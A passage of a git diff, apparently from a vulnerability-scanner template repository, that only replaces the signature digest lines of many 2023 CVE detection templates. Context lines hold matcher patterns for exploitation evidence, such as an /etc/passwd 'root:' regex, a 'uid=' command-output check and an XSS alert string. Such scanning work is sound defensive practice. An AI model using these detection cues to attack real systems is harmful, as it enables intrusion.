490a00463044022065509c17e436af513a6aebcc13d0c76b86c749c84a580f35e76d85e651638ef0022037ff3775b4ea005336fbd9c770d899f80e6b2fe8fe715df1bb5b4d901727c1f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022070dc193749f022e275bc9e3088894ea4afbaf6a94fb3f69105f67c63de7db08502210084147b4af64481e2756f95e326afa7e6d43c2c86e2ffcf85939cda69f0037071:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-46347.yaml b/http/cves/2023/CVE-2023-46347.yaml index e41de71bb2..bd7eabbed8 100644 --- a/http/cves/2023/CVE-2023-46347.yaml +++ b/http/cves/2023/CVE-2023-46347.yaml @@ -43,4 +43,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(header, "PrestaShop")' condition: and -# digest: 4b0a00483046022100fcf1fa0ab8abf930cc54e2e36e12162ce45903bb1174d276169b804569bdcbd3022100ba838fd7c91cfcf30ad83604f683acdbb55a6180642ef6b268212d503ab63407:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100edb938c16e344ea5241331746ddd7d3beaf4136dc6a8ca73d4e3ab60ba16446a02201ba5a444f090a2039229ce16ec441aa48e4bc23d96759573c322f73252509c5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-46359.yaml b/http/cves/2023/CVE-2023-46359.yaml index 0dbd4df84c..72532b378d 100644 --- a/http/cves/2023/CVE-2023-46359.yaml +++ b/http/cves/2023/CVE-2023-46359.yaml @@ -46,4 +46,4 @@ http: part: interactsh_protocol words: - "dns" -# digest: 490a0046304402202888b227c4fc5d9e9dbc27d36458020336b6ed8e6fcb725e333dfcdb7b41762c022029d7c176b42c015a3830d41ff3deb6ae9e2dbbe71548daabb3f1fc870bd5cba0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022003775ef2a134d4519b3079ec9f841daab7400a75283fd00c55fe1b36b2676b3c022100a98642834c2f00bf26a4f70df68eb4239a8b8b0477d4d37bd70fc987113413f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-46574.yaml b/http/cves/2023/CVE-2023-46574.yaml index ed38f64241..4fe591ede5 100644 --- a/http/cves/2023/CVE-2023-46574.yaml +++ b/http/cves/2023/CVE-2023-46574.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100facb0b4f06b2e2c5209852068584070ba87ac30a8da4f41b1a3c0b06e4428d84022002157bb5bfa1a8116a1b371084cccae6663353e69520bdbad5b0d70690cfa27c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100960438be8181e672812559f001beb25f081c663ede398df64cafc392da90ef6e022029d6c871ffe22a626d1540c3ac88b5e9809783bbc0672eab80664a24e9540c84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-46747.yaml b/http/cves/2023/CVE-2023-46747.yaml index 225185b574..95a49563b2 100644 --- a/http/cves/2023/CVE-2023-46747.yaml +++ b/http/cves/2023/CVE-2023-46747.yaml @@ -107,4 +107,4 @@ http: - "commandResult" - "uid=" condition: and -# digest: 490a0046304402204a6166b195e370aafa4a35dc97ea5b6f9d560fce6e62b0ad190525b9e9e0961c022076ba5b36c53579d2b152d64ef214f5a373cd5b9870f6e878c31e6e96ef776d57:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205694cf84f8014a16b1c92e95285d308240617c0fd9de7735b25f774e11dd629502206ec25efde8e95f07226eabdf1224798a2cf8e0381619bc127b2ff565e5599e5b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-47211.yaml b/http/cves/2023/CVE-2023-47211.yaml index efacf2bd89..86ebefb8fb 100644 --- a/http/cves/2023/CVE-2023-47211.yaml +++ b/http/cves/2023/CVE-2023-47211.yaml @@ -118,4 +118,4 @@ http: regex: - 'Set-Cookie: opmcsrfcookie=([^;]{50,})' internal: true -# digest: 4a0a00473045022046ba23acf7e691adb49f48326eda2454a03fe6b188cc7055424acab0a0f8f5a902210086729e6a1db300d9cb26325c7de9703a62f99b99b1fee762e8244852d1090129:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207463b57de77e273b29f35ef339d53a9d18d09b98c545fbfb4a406e3f06c8ce3b0220333ec1305069fb86c3b10d5887bdf0152765f1cf7b49c2907697875e3c10563c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-47246.yaml b/http/cves/2023/CVE-2023-47246.yaml index d64828fbc8..0afdb3ad93 100644 --- a/http/cves/2023/CVE-2023-47246.yaml +++ b/http/cves/2023/CVE-2023-47246.yaml @@ -52,4 +52,4 @@ http: - type: dsl dsl: - "contains(body_2,'CVE_TEST') && status_code_1==200 && status_code_2==200" -# digest: 4b0a00483046022100f7f75b62b4a54c4be8322fbe7d82e49e4b01ee263b923a0cc09b328c1854c1790221008d52673966d0c6e8085e732fa7209a3d155068e7debc5fbc2bb389c6bd254c30:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220337201087c74967a30ba3ce31445932ecdc2584314ba068984d047bd6d1ef04f02206a74c3228b19ba3cb1a4d2a443090fecd9996fc1cdac174a51390ea4f2267ba0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-47643.yaml b/http/cves/2023/CVE-2023-47643.yaml index 262d96bf24..e939213f39 100644 --- a/http/cves/2023/CVE-2023-47643.yaml +++ b/http/cves/2023/CVE-2023-47643.yaml @@ -70,4 +70,4 @@ http: regex: - "XSRF-TOKEN=([^;]+)" internal: true -# digest: 4a0a0047304502205fcff0bca02226d8721f77ef2680296485ecaa0568a076642e9814df6cbed3cb022100d0ad29dc6b9f00ecac8e36b78fcbd30a66ce73e811921b88ed3141edb35b734d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201738e663e68bb906203de6a56424f8696e9bdd5329ce6d18b5a72648017e5a810220670887eb41d7f62a8e6ca4c71bc43e05b42c8c90d3687ae87925fe80135dddc5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-48023.yaml b/http/cves/2023/CVE-2023-48023.yaml index 498ca34668..ce1494b39e 100644 --- a/http/cves/2023/CVE-2023-48023.yaml +++ b/http/cves/2023/CVE-2023-48023.yaml @@ -48,4 +48,4 @@ http: part: body words: - "

Interactsh Server

" -# digest: 4a0a00473045022100b701a3393f6a0c326a191f9b9570223ac48ecec79d89aee03232c824d80df162022040d57b11f6cfe588b60f4f5448e65429613c5cb117f7a694dd81f05b111a7cfa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207b4551473a09c16f6d6954d33b3b2bac9d42d1697fa91e804e02ee4aaf2cddf6022100e9150619a103c275d6dba6221898a72ba5d4ea31c7420d02fdc6b0d6d2d50e51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-48084.yaml b/http/cves/2023/CVE-2023-48084.yaml index c817761ce1..b4790aa481 100644 --- a/http/cves/2023/CVE-2023-48084.yaml +++ b/http/cves/2023/CVE-2023-48084.yaml @@ -74,4 +74,4 @@ http: regex: - 'name="nsp" value="(.*)">' internal: true -# digest: 490a004630440220177500e88fc209aa5ccfdc735f5b72fd05d71b6fa2e2f3deda7fb6c7c649ebae02207d01edc1254186264417bc50548c356df3197114ca076afcf20ce87f3a2ddb59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220623f7fb2b34ade32923274720fe9a2b327b9ac34899c696d8ecccdc433721f6e022100e5f82eb99ea3cbe02399c7de0f20d00eb874b79262bc835e67c77a461141c2ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-48777.yaml b/http/cves/2023/CVE-2023-48777.yaml index 7b357f721e..0159236de2 100644 --- a/http/cves/2023/CVE-2023-48777.yaml +++ b/http/cves/2023/CVE-2023-48777.yaml @@ -66,4 +66,4 @@ http: group: 1 regex: - 'admin\\\/admin\-ajax\.php","nonce":"([0-9a-z]+)"' -# digest: 4b0a00483046022100b71e9b31dece4dcf31fbd4629f0aea2339c0ec8922cf20066400a2d2232bca0c02210091ea465a635a3c4c909c86e44122140e35c0f0fc6fb70e2e4182abe48c32c568:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008bf58aa24ddd3c56ea97495962a5596e8fb115ff791e778f798822b880762953022100e12cc588c2b1eb10312f7c33f124907aaea0088092f98148f02bb2622e8bd232:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-49070.yaml b/http/cves/2023/CVE-2023-49070.yaml index 976ed2e726..4c2c0b4e95 100644 --- a/http/cves/2023/CVE-2023-49070.yaml +++ b/http/cves/2023/CVE-2023-49070.yaml @@ -72,4 +72,4 @@ http: part: body words: - 'faultString' -# digest: 4a0a00473045022100cffd4ad024f079fedf1e77fb9ec9f09eae4496a27a8a6732e46740402a17f7e4022025665fe685dae977b34841487c70fb9a0e25f9c5c81c78eab968913221e623f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220740b14d8eef1aba127b708193d7b94fb5304bc6c63c705a09ae663b21e27d8a9022100f8c549328c35cf51373ab2de543caabae74b109d9fba9f03e92b081567099313:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-49103.yaml b/http/cves/2023/CVE-2023-49103.yaml index a3bf5fea1d..fa01d53757 100644 --- a/http/cves/2023/CVE-2023-49103.yaml +++ b/http/cves/2023/CVE-2023-49103.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a50feff13ce9b18009d5215d25e7cf2a21d76864eb3518fdcefb76fe92c51aeb02207b79b1e42efa5c35313683ff3a74ad2e4b212a8990de7e0c6675a5c1289a7740:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220043300e3d261edbf2297cc82c3bfedf84abe9d4cd824a6fa06a3232774d02425022100be760480bfaf9f15aa035cfb3c7fabbb475c7abc9582d9f2783c54bdeb30075d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4966.yaml b/http/cves/2023/CVE-2023-4966.yaml index 0957853d15..59ac752dfe 100644 --- a/http/cves/2023/CVE-2023-4966.yaml +++ b/http/cves/2023/CVE-2023-4966.yaml @@ -73,4 +73,4 @@ http: - type: word words: - '{"issuer":' -# digest: 4a0a004730450221008ef3592dc8e2983c4c97f1d4bd61621dc8b61c4b92f541ac08062246ab92e59b0220378f60f6ef825b07815efe45093361bf97001b1abe5e8048f150917a02b52861:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d53c103c37fab6d039e715bd8916c5d7fb079cc8721531b1d40ad2fd83241fb5022100ae404d6a85e19235109ce7bfc81e185177cd90121910b674c011b6673c6d43ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4973.yaml b/http/cves/2023/CVE-2023-4973.yaml index 8b06122783..a2a85e4b84 100644 --- a/http/cves/2023/CVE-2023-4973.yaml +++ b/http/cves/2023/CVE-2023-4973.yaml @@ -40,4 +40,4 @@ http: - 'contains(header, "text/html")' - 'contains_all(body, "", "List of tuitions")' condition: and -# digest: 4a0a0047304502205f6ae325959f6e9980c9fb5f10847fe23ea52fbcce5d978c2509600679618ccb022100b55286c871e65450fa5435b371f8a2a4782fd00a309678790ff8d0c9f488a678:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022003e0aa31c056206272163376e4fb2c16f1424282178f7657a1304483ba6b675702202d0e0134266df1580d750c23d6339d934549b7fa97dd0ff6b4dffc6ae03e38e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4974.yaml b/http/cves/2023/CVE-2023-4974.yaml index d0baf60453..696a10e377 100644 --- a/http/cves/2023/CVE-2023-4974.yaml +++ b/http/cves/2023/CVE-2023-4974.yaml @@ -45,4 +45,4 @@ http: - status_code == 500 - contains(body, "Courses") condition: and -# digest: 4a0a00473045022100e23faf9f838b029cd0f20140f8f49a5ef9527f7f4167a8a157d91b3efe02991102201e489e7e00fe8cffa6a8f05e848f7897cb133419ac2b4b50d1e79ded662667a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201dcf423b4b6924981e6abf474979ba0989f52fc8514307b6c99025e5f0d845c3022100fae8105c7521925c94ec0ccbdf1ff865446dffecffab99eaf917da8fba3c104f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-5003.yaml b/http/cves/2023/CVE-2023-5003.yaml index 4a8ec14968..adf1fea821 100644 --- a/http/cves/2023/CVE-2023-5003.yaml +++ b/http/cves/2023/CVE-2023-5003.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f09b3ed688a57aab5952bc84129c5a4465f1d37462afe7b11f99697de9611f67022100cb0ed6fbee8c0c97a590626b51b036e3f5365e5b7f09b03da4eb88aea294d47f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204fcec3fd699084b441ca3a706cf44ff0521716935ee18cebb1efb184eb2b15a20221009553830ff5f7b4dd5de086b1a2afae4f141b17c89d13d153b6dd97702002ee2d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-50290.yaml b/http/cves/2023/CVE-2023-50290.yaml index fdc14dffa9..71f19f0bc8 100644 --- a/http/cves/2023/CVE-2023-50290.yaml +++ b/http/cves/2023/CVE-2023-50290.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100dfc250b821506c211571ede1dc2ed5a1a66df436723ab98c40b9002c978410fa022100c47b941c9ef9a9b77e73bbf54e94a9ab5a094e082906629c36ae0f7bb6b2bca7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022032c22d2f2f08912db32782312629457f03184a56631aa39d3cb5ac8e77ee86a202204951ff3e98e750b1b2cc2b50e2f68c1d7976f8b71d2d79af28c8208e522aaac7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-5074.yaml b/http/cves/2023/CVE-2023-5074.yaml index b607a9fc06..c6f5ea43af 100644 --- a/http/cves/2023/CVE-2023-5074.yaml +++ b/http/cves/2023/CVE-2023-5074.yaml @@ -46,4 +46,4 @@ http: - 'contains(body, "userName") && contains(body, "passWord") && contains(body, "isEmailActivate")' - 'contains(header, "application/json")' condition: and -# digest: 4b0a0048304602210083ee5a70d6d846d46a8a5c2535079e54eccffdf1fa56db089bfc98c4147489e3022100a8f4230b9de5251d69eec17c7c526742b63fe1a5079f762b42682e55ba8d3df8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ef974764719aca504fd797757668c8d85cd49d27a627d2312f56a94961c08122022065c89d47dc88de99520cf4af0aed01eef85a713b92a3cea324ca68e8fdd7af55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-5089.yaml b/http/cves/2023/CVE-2023-5089.yaml index 46ea75baeb..e09912084d 100644 --- a/http/cves/2023/CVE-2023-5089.yaml +++ b/http/cves/2023/CVE-2023-5089.yaml @@ -49,4 +49,4 @@ http: - type: kval kval: - location -# digest: 490a0046304402207db7ae441786fbebf18a414fee3d3e486b2ce38371190925dba05c23476e55d1022009064d5fee882083e93c3d32c243affcca26d3840da6978d01aa971db1a33c12:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d66beed359c83006b9629ad191773331ca489271eefc9d64a540916b6eda004802206d977265f836902b119d0831d714ae8053ec107bc86e95dd0c2640c04579436a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-50917.yaml b/http/cves/2023/CVE-2023-50917.yaml index 7df5c46562..19088e23a4 100644 --- a/http/cves/2023/CVE-2023-50917.yaml +++ b/http/cves/2023/CVE-2023-50917.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205a6564b18f0e91dbe2165e265eccd7fe7ef54753da65860b5b49b86fd2640ed802206b0218a9b2b042f7f703672a5aa1d2e3ca94454c0f76c916297587805f66de3e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022068e65beb56aaa06e7d75656ee95a0bc327651196bd6781bce7815e0494e15ce102201d0a3353c30b2fa1270cd29cfc4af8a8df6cd56a06b17e781ba86db3ce853e26:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-50968.yaml b/http/cves/2023/CVE-2023-50968.yaml index a0f7b0385d..3c4af40b7d 100644 --- a/http/cves/2023/CVE-2023-50968.yaml +++ b/http/cves/2023/CVE-2023-50968.yaml @@ -68,4 +68,4 @@ http: part: header words: - 'OFBiz.Visitor=' -# digest: 4b0a00483046022100b358974140cef5e64159e41dd88e9e6711e0128c881498abb4c9787908e34c0d0221008557ca55d44a27fe6782e05449297d70607e1ad828f4d719347cbd72a7af7496:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a7c632b2971df4f69ad28132c54b26a3d0b8a8e45c8442612da9072e45190ceb022032552a4f03e7a272c0b0ef83cfe0e8c6cb5517eb9c443aab72ab8689070c8158:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-51467.yaml b/http/cves/2023/CVE-2023-51467.yaml index b414d79fa2..9fbb9682fc 100644 --- a/http/cves/2023/CVE-2023-51467.yaml +++ b/http/cves/2023/CVE-2023-51467.yaml @@ -54,4 +54,4 @@ http: part: header words: - 'OFBiz.Visitor=' -# digest: 4a0a00473045022100dfe4f5f4220b14117763d806483b72e44e845e9457d667f7d08ec0552d0a6fe70220246d0404fcaaaa2eb000ca2831d3689ca1b8d5c4fa08e6ffdaf7ef2d0f49a15e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b1174f5e1d75faf17b66721527129b7e78eb527e22950400cc84c1e138218204022009f55a97efe8837f938969eeb491a4d5d83461831d844785e8b139881d19a963:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-52085.yaml b/http/cves/2023/CVE-2023-52085.yaml index 6d7b5535c9..e0306d9228 100644 --- a/http/cves/2023/CVE-2023-52085.yaml +++ b/http/cves/2023/CVE-2023-52085.yaml @@ -74,4 +74,4 @@ http: regex: - '' internal: true -# digest: 490a00463044022055cf43348ae2d63666b5df455c64e1cc6ba5376a436ef70aea9f378a1714e70502207454984aa299e330fdd118ac85364b81ed89c9af687b1d18b0544742f73430b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200e104a483850d66787d611030336f222ee3d4972ef37c8039c12a483b4e5b2a60220155396fef3818a7af539443ef744dfc91bb98446c28034964a036156915641d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-5244.yaml b/http/cves/2023/CVE-2023-5244.yaml index a21c52c6f2..bcdd630272 100644 --- a/http/cves/2023/CVE-2023-5244.yaml +++ b/http/cves/2023/CVE-2023-5244.yaml @@ -45,4 +45,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "alert(document.domain)", "microweber")' condition: and -# digest: 4a0a00473045022100e016fc0a7b44a3a1885471355c0a4d24584d942a24fc88617370a727129a30c602206c38f0ad7918ebea610779e419bee24b5040a2382bdcc0fbabfeee26a84a2561:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100819eecaa7e19bdcec5d1b84bf0c64575dc5c21adacaf63de71d909313b242221022100d4583f27f0819431ae6d3290dc62087423c4c633c767377c2663402c7ef8539e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-5830.yaml b/http/cves/2023/CVE-2023-5830.yaml index f27c76451d..4060f28cdc 100644 --- a/http/cves/2023/CVE-2023-5830.yaml +++ b/http/cves/2023/CVE-2023-5830.yaml @@ -64,4 +64,4 @@ http: part: body words: - '"Authorized":false' -# digest: 490a0046304402201db35b1cbbaf04fd779f6cba94aa775c094313d177ffd35c9020614d6d4d3ede02206aafe4e7ec826b62c6e7875a4f4269ea537ddb79dc6f2d0f10455a8bb6f68b21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220425c015f75f4be26cac35e09ccec4b8750de351cdf8d7650257509c98c93ac41022100d59c935fc0215a9b88b0d979237d9dc944338c9f9a295514f429a1fdb3ae3bb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-5914.yaml b/http/cves/2023/CVE-2023-5914.yaml index 1cb1794eef..bc0b0d27c6 100644 --- a/http/cves/2023/CVE-2023-5914.yaml +++ b/http/cves/2023/CVE-2023-5914.yaml @@ -44,4 +44,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "", "XmlException")' condition: and -# digest: 4a0a00473045022100836c3a82e583dab53376372e8a4feec400f23f27175cdb8186220a18dfcc10bb022061f0bedf50d474d78c825b26a4d6ed0aaf62471723614d3384831b81ee991d7d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ccec8044121731cec8adc8d22c54e462ada30eef8c491cdecc278c315e01502c02207c5d9be110a2f11e8fffcd7f6d539a48b32431bc9f28f5e62628be555f8db784:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-5991.yaml b/http/cves/2023/CVE-2023-5991.yaml index 351995f731..45d854077e 100644 --- a/http/cves/2023/CVE-2023-5991.yaml +++ b/http/cves/2023/CVE-2023-5991.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e48798224d0152e1a3c25a11bb3f155c73b506b3f11b3a1266d80e9ddbe0add902205800bd65f60db5f4230f7efad32427f34e33704e3b2d36d8eba55a388719c0ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008aed4131d72f2a882a3d06d2d9baa4b4e8c1587b36400dfe6e4177d7ab0dfd74022025db93ee8eb043c22cac910ae7ddafe92f578a3c00db013fe89aa59d4e0e35ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6018.yaml b/http/cves/2023/CVE-2023-6018.yaml index fec49ff6dd..3dbba32730 100644 --- a/http/cves/2023/CVE-2023-6018.yaml +++ b/http/cves/2023/CVE-2023-6018.yaml @@ -71,4 +71,4 @@ http: - '"registered_model":' - '"name":' condition: and -# digest: 490a0046304402202237b7d220fa9ba25938a5845cd7900b8a99339e3f8c0749d5eeb66fd267490102204422bcbe402037b1c99ca0738680b4fb2c61ccdd7a90f6323ad564ff9d5f8e53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210099d1acabd37ecf0040ced0da3af09a84bf196bdafe114d2713bca0d04afb379702201a3d094b47d82e82dbe775c0a58c39a548a6f67d656ffa37c1c45a5d5d43591b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6020.yaml b/http/cves/2023/CVE-2023-6020.yaml index eb104322b9..fbea8e8569 100644 --- a/http/cves/2023/CVE-2023-6020.yaml +++ b/http/cves/2023/CVE-2023-6020.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022064e5166ee6da2fdd8be79992992583caec156121337bf89b14ff004331bb6d8802201016dfbf0e39ae095c915d876b1b57c3186997a91cd28c03f040fa60ca413647:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220016faf5d218a154c3f85462ee9932819b2423bfcb41ffda404b70dee337dd6b7022100e89b86ddec2eb7b76100a9561996bcb97cb09eb953888a2dc7890bf1b81e5f32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6021.yaml b/http/cves/2023/CVE-2023-6021.yaml index 2faaf3f212..a3e9672f88 100644 --- a/http/cves/2023/CVE-2023-6021.yaml +++ b/http/cves/2023/CVE-2023-6021.yaml @@ -62,4 +62,4 @@ http: name: nodeid json: - '..|objects|.nodeId//empty[0]' -# digest: 4a0a00473045022100ceb1c44419fd44d0fa0a922fda30289e5d241940f61e7d18e23a56936d96db4f0220347ff010c1aba9d8ec613cae89ee2adb75c775e23daece9d2186d9c06e04892f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e1248f0ce74ec3ad6e929f214a946c92e4efaf53912ff535667598345e88495f02206ca3d10c0df29c683bb373a193d673c8c661b9096c6a83cfe8f81015012efe4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6023.yaml b/http/cves/2023/CVE-2023-6023.yaml index cc4f9e81c2..179497aa32 100644 --- a/http/cves/2023/CVE-2023-6023.yaml +++ b/http/cves/2023/CVE-2023-6023.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022072f52b5c63da178f6fff73e03d9f0a370f6d1645f293f20fb73482cd8fa6f2ba02204502955488ad9950bc0a63a1a35fb3874dfce19ec8a5e8371cb8a8d0adb66fe7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c69b25625a73d8650d632e7e123959c5bae22681146d202eccf0312e7c2cd810022100842c2167554daecf73927e131695af94eb60b7f1f1b504206e0730cdbf4c19d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6038.yaml b/http/cves/2023/CVE-2023-6038.yaml index ecb1af872c..20a19867ea 100644 --- a/http/cves/2023/CVE-2023-6038.yaml +++ b/http/cves/2023/CVE-2023-6038.yaml @@ -51,4 +51,4 @@ http: - "regex('root:.*:0:0:', body_2)" - "status_code_2 == 200" condition: and -# digest: 490a0046304402206dbfed0c28b3e21350071492bcee839d9d7082a7a9d67b625426821601cf19e202205a45e1db6cb7610dfd89b63c1b98039b6c0ccf2647f9912078214cb374228410:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bbca674fd6eedb1264de3b9612164d3bf6f1b70a3bb7d87303eb499e52fa1f3e02200be4bf6e50b284676c440a392ba0bc467b410019a2d066f93ad9cdce0c734694:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6063.yaml b/http/cves/2023/CVE-2023-6063.yaml index 801d41fbe0..59ec82f510 100644 --- a/http/cves/2023/CVE-2023-6063.yaml +++ b/http/cves/2023/CVE-2023-6063.yaml @@ -63,4 +63,4 @@ http: - 'status_code == 200' - 'contains(body, "/wp-")' condition: and -# digest: 4a0a00473045022004cfaae0dc548a746f2ac8518775b253ea274661021c3b7f22759e9d709b8ee6022100843555767a7cac5718662e92a81db100fec5216a00af6868223053d1470dfedf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100df685a1d55b11e797278a035af7b4589541daf50f23773916305e7782256b763022100a6e038409b46bc92465fb474c672a5df2ee6272d28ac94f68353d1bf0c7960b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6065.yaml b/http/cves/2023/CVE-2023-6065.yaml index c585cad89b..1ff6b13a5e 100644 --- a/http/cves/2023/CVE-2023-6065.yaml +++ b/http/cves/2023/CVE-2023-6065.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100fc29a717cad3f1cee3289a56267f95133718b5524f83746d1cbe95c529f4a15d022048929c54cdc6f093d8ed3c634a2946ca4874f463759bb3ab0eb1e9df35d6e8cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022005001b01391a5cf9caf01e1e3db906c86acc1482e7c721014903bdcfb419bd3c022100a49e6cf5b3109c7194bc2ef657dd5c0db40e36630a685619738a2d06a62e792d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6114.yaml b/http/cves/2023/CVE-2023-6114.yaml index ca409bb30f..c25deecc3b 100644 --- a/http/cves/2023/CVE-2023-6114.yaml +++ b/http/cves/2023/CVE-2023-6114.yaml @@ -41,4 +41,4 @@ http: - "status_code == 200" - "contains(body, '/tmp') && contains(body, 'Index of')" condition: and -# digest: 490a00463044022022eea8235ae8015d6909cf70399d1ab466220b6ae36c3511acbb7bd3f01a463e02201e9729a0db2a9791ef37a4cc37b8219c806799e6669590f6c6149a82bb945a79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100dcc94d59aa7434d71f25eac9193fbfafab7a322c155123ae491ac4510c38ccea022054af43cbe55ecf715023e83dbf40e7e5070d4a06a20a50402a5c5d296ee96dfb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6360.yaml b/http/cves/2023/CVE-2023-6360.yaml index ac56d2252c..49a9b9aa46 100644 --- a/http/cves/2023/CVE-2023-6360.yaml +++ b/http/cves/2023/CVE-2023-6360.yaml @@ -55,4 +55,4 @@ http: - 'contains(body, "[]")' - 'duration >= 6' condition: and -# digest: 